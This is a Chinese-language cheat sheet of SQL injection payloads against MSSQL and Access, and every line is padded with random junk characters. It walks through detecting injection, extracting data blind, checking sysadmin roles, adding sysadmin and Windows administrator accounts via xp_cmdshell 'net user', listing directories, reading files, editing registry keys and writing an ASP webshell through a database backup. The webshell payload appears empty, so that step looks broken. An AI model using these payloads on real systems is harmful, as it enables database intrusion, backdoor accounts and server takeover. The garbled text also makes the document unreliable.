1.判断是否有注入;and 1=1 ;and 1=2 ;1{=t!z=
2.初步判断是否是mssql ;and user>0 ir>h3Zk
9==4T$nM[
3.注入参数是字符'and [查询条件] and ''=' 2f@Cy+W'[
*78c2`)[
4.搜索时没过滤参数的'and [查询条件] and '%25'=' D7JrGaF{
}LKD9U5;8
5.判断数据库系统 jZPGUoRLg
s}OL)rW=}
;and (select count(*) from sysobjects)>0 mssql i*m;kWu,
T*PEUq
;and (select count(*) from msysobjects)>0 access Wf"GA i
VHMQY*lk
YG8V\4
SQ
]+3M\ ib
6.猜数据库 ;and (select Count(*) from [数据库名])>0 (dD7"zQ
4%w<Ekd
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 q5= ,\S3=
{*TB }Xsr,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2[uFAgf@
W Zm8!Y
9.(1)猜字段的ascii值(access) #asi%&3pP
+ xO3<u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 DB-79U %W
A%HIfSzQBS
(2)猜字段的ascii值(mssql) v[{7\Hha
3nc\6v%
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 KV|D]}
+6P[TqR
10.测试权限结构(mssql) oYTLC@98}
@6tczU}ak
'j,
([
T 4p}5ew'
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z|Rc54Ct
IF5-@hag,
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- C$~ly=@
+hr|$
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- xH{-UQ3R
:r hB=
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,f>9oOqqA
jOrfI-&.G
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5X+`aB
8b~
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^uN[rHZ*u
IF|;;*Z8
;and 1=(select IS_MEMBER('db_owner'));-- T$%QK?B
: slO0
Ao}<a1f
fxoEK}TM
11.添加mssql和系统的帐户 8tQL$CbO
M'<% d[
;exec master.dbo.sp_addlogin username;-- ;*j
K!
;exec master.dbo.sp_password null,username,password;-- %aMC[i
G~(\N?2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- tlUh8os
u*P@Nuy6
;exec master.dbo.xp_cmdshell 'net user username password /7Pqy2sgE
!E?+1WDS0
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- X5VNj|IE
4c 8{AZ
;exec master.dbo.xp_cmdshell 'net user username password /add';-- )1M2}11uS
(?R!y -
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- hx9t{Zi
j,^&U|!
JG'%HJ"D
>.`*KQdan
12.(1)遍历目录 >| ,`E
DGb1_2ZQ
;create table dirs(paths varchar(100), id int) Aipm=C8
{G x=QNd
;insert dirs exec master.dbo.xp_dirtree 'c:\' F%o!+%&7
ud5}jyJ
;and (select top 1 paths from dirs)>0 r|4D.O]
wzju)q S
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) l`N#~<.
u%:`r*r
.Vnb+o
)AkBo
(2)遍历目录 Q\kWQOB_
K=JDl-#!
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z=U+FHdh/-
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 T*%GeY
[
\zg R]|
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ,m?V3xvq
FsWp>}o
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %|}*xMQ
/ kK*%TP
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 "X2'k@s`
upaP,ik}~
(:OMt2{r
EF\OM?R
13.mssql中的存储过程 [.xY>\e
QR"+fzOL
xp_regenumvalues 注册表根键, 子键 Lg!E
EMO{u
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $RY-yKmi
cb]X27uww
xp_regread 根键,子键,键值名 iv +a5
JZ-@za6u
;exec xp_regread I]W7FZ=o
3c6e$/
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6}I X{nQI
/fb}]e]N
xp_regwrite 根键,子键, 值名, 值类型, 值 J+IItO4%
B//*hH >F
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 bHRn}K+<}c
6}N`YOJ.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 [>a3` 0M
3WQa^'u
xp_regdeletevalue 根键,子键,值名 b5=|1SjR
Bc }o3oc
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 "o`?-bQ:
8=L"rekV_
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Bh=t%#y|`
[HWVS
)4B`U(%M~
=l/Dc=[
14.mssql的backup创建webshell ;.sYE/ZVi
rD <T
use model }YdC[b$j^
)u{]rb[
create table cmd(str image); ^P~,bO&H.Z
T~/>U&k}J
insert into cmd(str) values (''); j3-o}6
v"yu7tZ3N
backup database model to disk='c:\l.asp'; _"Ym]y28li
8,IF%Z+LI
_xh)]R
"Tser*i )
15.mssql内置函数 N9G xJ6
,}'8.
f
;and (select @@version)>0 获得Windows的版本号 F*J1w|)F0
,v})
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =Mwuhk|*
/}E2Rr?{
;and (select user_name())>0 爆当前系统的连接用户 [06m{QJ)1
Q >[>{N&\
;and (select db_name())>0 得到当前连接的数据库 H}~K51
MF'Z?M
2qE_SSXn
?sdSi--
16.简洁的webshell ;E
9o%f:o
C=o-3w
use model 9;6)b0=$
hu0z
36
create table cmd(str image); )cizd^{
d'MZ%.#
insert into cmd(str) values (''); ps2j ]g
[Lje?M* r
backup database model to disk='g:\wwwtest\l.asp';